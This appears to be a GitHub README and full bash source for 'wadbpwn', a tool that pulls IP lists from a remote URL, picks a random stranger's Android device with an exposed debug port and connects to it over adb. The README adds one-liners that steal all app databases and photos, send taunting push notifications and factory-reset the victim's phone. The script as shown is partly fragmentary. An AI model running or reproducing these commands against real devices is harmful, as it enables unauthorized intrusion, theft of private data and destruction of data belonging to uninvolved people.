Hack random android device with 100% guarantee to succeed within 1 second.
Get Started On Linux/MacOSX
git clone https://github.com/wuseman/wadbpwn
cd wadbpwn
chmod +x wadb*
bash ./wadbpwn.sh
- Wait ~1 second
Target has been pwned!
- Enjoy ;-)
Get Started On Windows 10
Install any linux distro from microsoft store and run commands above..
Tips & Tricks made by wuseman
Steal all databases from the device ( require root )
which su &> /dev/null
if [[ $? -eq "0" ]]; then
adb pull /data/data/ /some/path
printf "* No root detected, just try another target..\n"
exit 1
Steal all pictures:
A simple example:
PICS="$(adb shell 'su -c find / \( -name '*.png' -name '*.jpg*' \)')"
for pictures in $PICS; do
adb pull -p $PICS /some/folder
printf "Done..is it your lucky day? ;-)\n"
Send a push notice:
adb shell am broadcast -a com.google.android.c2dm.intent.RECEIVE -n <your.app.package>/com.google.android.gms.gcm.GcmReceiver --es "You h4v3 b33n h3cked mat3" "hrhr!"
Factory reset of the device:
adb shell am broadcast -a android.intent.action.MASTER_CLEAR
adb shell reboot
Full script, wadbpwn.sh
#### #####
#### A notice to all nerds. #####
#### If you will copy developers real work it will not make you a hacker. #####
#### Resepect all developers, we doing this because it's fun! #####
#### #####
################################ SOURCE CODE ###################################
###################### XXXXXXX WAS FOUNDED BY WUSEMAN ##########################
#### #####
#### XXXXX #####
#### Copyright (C) 2018-2019, wuseman #####
#### #####
#### This program is free software; you can redistribute it and/or modify #####
#### it under the terms of the GNU General Public License as published by #####
#### the Free Software Foundation; either version 2 of the License, or #####
#### (at your option) any later version. #####
#### #####
#### This program is distributed in the hope that it will be useful, #####
#### but WITHOUT ANY WARRANTY; without even the implied warranty of #####
#### GNU General Public License for more details. #####
#### #####
#### You must obey the GNU General Public License. If you will modify #####
#### this file(s), you may extend this exception to your version #####
#### of the file(s), but you are not obligated to do so. If you do not #####
#### wish to do so, delete this exception statement from your version. #####
#### If you delete this exception statement from all source files in the #####
#### program, then also delete it here. #####
#### #####
#### Contact: #####
#### IRC: Freenode @ wuseman #####
#### Mail: wuseman <wuseman@nr1.nu> #####
#### #####
banner() {
cat << "EOF"
_ ____ ____ ____ _ _
__ __ U /"\ u | _"\U | __")uU| _"\ u__ __ | \ |"|
\"\ /"/ \/ _ \/ /| | | |\| _ \/\| |_) |/\"\ /"/<| \| |> Author: wuseman <wuseman@nr1.nu>
/\ \ /\ / /\ / ___ \ U| |_| |\| |_) | | __/ /\ \ /\ / /\U| |\ |u Version: 1.0
U \ V V / U/_/ \_\ |____/ u|____/ |_| U \ V V / U|_| \_|
.-,_\ /\ /_,-. \\ >> |||_ _|| \\_ ||>>_ .-,_\ /\ /_,-.|| \\,-.
\_)-' '-(_/ (__) (__)(__)_)(__) (__)(__)__) \_)-' '-(_/ (_") (_/
You will succeed, whether you are a professional or a n00b.
status() {
ADBW=$(adb devices | sed -n '2p'|awk '{print $2}' | sed 's/device/normal/g')
ADBF="$(fastboot devices | grep fastboot|awk '{print $2}')"
ADBOFF="$(adb devices | sed -n 2p)"
if [[ $ADBW = "normal" ]]; then
echo "normal" > $(pwd)/.wadbpwn-status
elif [[ $ADBW = "unauthorized" ]]; then
echo " * Please allow this pc to authorize" > $(pwd)/.wdroid-status
elif [[ $ADBW = "recovery" ]]; then
echo "recovery" > $(pwd)/.wdroid-status
elif [[ $ADBF = "fastboot" ]]; then
echo "fastboot" > $(pwd)/.wdroid-status
echo " * No device connected.."
mustbeinnormalmode() {
if [[ ! $(cat $(pwd)/.wdroid-status) = "normal" ]]; then
echo "Device must be in normal mode for this feature, aborted.."
exit 1
requirements() {
adb="$(which adb 2> /dev/null)"
distro=$(cat /etc/os-release | head -n 1 | cut -d'=' -f2 | sed 's/"//g')
if [ -z "$adb" ]; then
read -p "Install adb (Y/n) " adbinstall
case $adbinstall in
sleep 1
case $distro in
echo -e "\nIt seems you running \e[1;32m$distro\e[0m wich is supported, installing adb...."
emerge --ask android-tools ;;
echo -e "It seems you running \e[1;32m$distro\e[0m wich is supported, installing adb....\n"
emerge --ask android-tools ;;
echo -e "It seems you running \e[1;32m$distro\e[0m wich is supported, installing adb....\n"
apt update -y; apt upgrade -y; apt-get install adb ;;
echo -e "It seems you running \e[1;32m$distro\e[0m wich is supported, installing adb....\n"
apt update -y; apt upgrade -y; apt-get install adb ;;
echo -e "It seems you running \e[1;32m$distro\e[0m wich is supported, installing adb....\n"
apt update -y; apt upgrade -y; apt-get install adb ;;
echo -e "It seems you running \e[1;32m$distro\e[0m wich is supported, installing adb....\n"
apt update -y; apt upgrade -y; apt-get install adb ;;
"no") echo "Aborted." ;
exit 0 ;;
echo -e "This tool is not supported for $distro, please go compile it from source instead...\n"
root_required() {
adb shell which su &> /dev/null; if [[ $? = "1" ]]; then echo "This option need device to be rooted, aborted..";exit 1; fi
curl -sL $TARGETS|grep -oE '\b([0-9]{1,3}\.){3}[0-9]{1,3}\b'|shuf -n 1|xargs adb connect > hacked-ip.txt
if [[ $(cat hacked-ip.txt |awk '{print $3}' |sed 's/^/Woohha!! You have been successfully connected to: /g'; echo) = "connected" ]]; then
printf "* Something went wrong, please try again..\n"
cat hacked-ip.txt |awk '{print $3}' |sed 's/^/Woohha!! You have been successfully connected to: /g'; echo
# Let us remove the text file and exit the program..
rm hacked-ip.txt &> /dev/null
echo -e "Hint: use 'adb shell' for enter the device shell..\n"
exit 1